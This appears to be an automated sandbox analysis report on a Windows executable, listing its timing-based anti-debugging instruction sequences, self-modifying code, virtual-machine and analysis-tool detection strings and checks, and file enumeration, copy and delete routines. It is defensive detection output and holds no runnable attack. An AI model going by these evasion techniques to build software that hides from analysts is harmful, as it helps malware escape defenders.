                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7650 second address: 10E765C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E765C second address: 10E7679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82072h 0x00000007 pushad 0x00000008 jns 00007F0640D82066h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F12C4 second address: 10F12C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F12C8 second address: 10F12F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F0640D82076h 0x0000000f pushad 0x00000010 jns 00007F0640D82066h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F12F1 second address: 10F12F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F12F7 second address: 10F130E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0640D8206Eh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0D26 second address: 10F0D39 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0640516B3Ch 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110417E second address: 1104184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A461 second address: 110A467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A467 second address: 110A471 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A471 second address: 110A475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A475 second address: 110A485 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F0640D82066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A485 second address: 110A48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A48F second address: 110A493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AB51 second address: 111AB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F0640516B38h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AE66 second address: 111AE6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AE6C second address: 111AE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AE70 second address: 111AE74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111AE74 second address: 111AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F0640516B48h 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F0640516B36h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BCA8 second address: 111BCB8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0640D82066h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111BCB8 second address: 111BCC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EA8D second address: 111EAA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0640D82066h 0x00000009 je 00007F0640D82066h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EAA4 second address: 111EAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F0640516B3Ch 0x00000013 jl 00007F0640516B36h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0640516B3Eh 0x00000020 jl 00007F0640516B36h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EAD3 second address: 111EAE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0640D8206Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111EC24 second address: 111EC6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F0640516B4Dh 0x00000011 jmp 00007F0640516B47h 0x00000016 jnl 00007F0640516B4Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112640B second address: 1126410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D463 second address: 112D467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D467 second address: 112D47B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0640D82066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jo 00007F0640D82066h 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D2EA second address: 112D2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D2EF second address: 112D322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0640D82066h 0x00000009 jmp 00007F0640D8206Ch 0x0000000e jng 00007F0640D82066h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F0640D82073h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D322 second address: 112D326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D326 second address: 112D332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112D332 second address: 112D33A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112EB33 second address: 112EB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133878 second address: 1133894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0640516B43h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112AF47 second address: 112AF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F4DD second address: 113F4E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142364 second address: 1142368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142368 second address: 114236C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114236C second address: 1142376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142376 second address: 114237C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114237C second address: 1142380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114209A second address: 114209E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114209E second address: 11420C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0640D82072h 0x0000000f ja 00007F0640D82066h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115190A second address: 115190E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151BB1 second address: 1151BD2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F0640D82076h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151BD2 second address: 1151BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151D36 second address: 1151D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151D3C second address: 1151D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640516B44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1151D54 second address: 1151D68 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0640D82066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F0640D8206Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11520DA second address: 11520E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jl 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152245 second address: 115224B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152645 second address: 1152649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1152649 second address: 1152671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82074h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F0640D82066h 0x00000013 jng 00007F0640D82066h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11552CD second address: 11552D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11552D1 second address: 11552D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11552D7 second address: 11552FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F0640516B38h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11552FA second address: 11552FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11558F4 second address: 1155900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155900 second address: 1155981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F0640D8206Ch 0x0000000b popad 0x0000000c nop 0x0000000d push dword ptr [ebp+122D23FBh] 0x00000013 mov dword ptr [ebp+1248A4F3h], ecx 0x00000019 call 00007F0640D82069h 0x0000001e pushad 0x0000001f jmp 00007F0640D8206Eh 0x00000024 jmp 00007F0640D82075h 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F0640D82078h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007F0640D82071h 0x00000039 mov eax, dword ptr [eax] 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155981 second address: 115598F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0640516B36h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156BA3 second address: 1156BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007F0640D8209Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0640D82066h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A04F4 second address: 57A04F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A04F8 second address: 57A0527 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F0640D82076h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0640D8206Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A0527 second address: 57A052D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A052D second address: 57A0533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A0533 second address: 57A0537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A0537 second address: 57A0552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0640D8206Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A0552 second address: 57A0561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A0561 second address: 57A0566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A0566 second address: 57A056C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C322 second address: 107C347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F0640D82079h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C347 second address: 107C34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EBD9D2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 106CA6C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: EBD8F7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10F6E22 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37638
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BE40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BDE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BDF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BE47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BD1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BDDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BE3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BE4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BDEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BDBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BDDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BDDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD1160 GetSystemInfo,ExitProcess,0_2_00BD1160
                Source: file.exe, file.exe, 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1753243458.000000000189E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1753243458.00000000018F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1753243458.0000000001918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1753243458.00000000018E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: file.exe, 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36473
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36450
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36453
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36465
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36338
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36505
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD4610 VirtualProtect ?,00000004,00000100,000000000_2_00BD4610
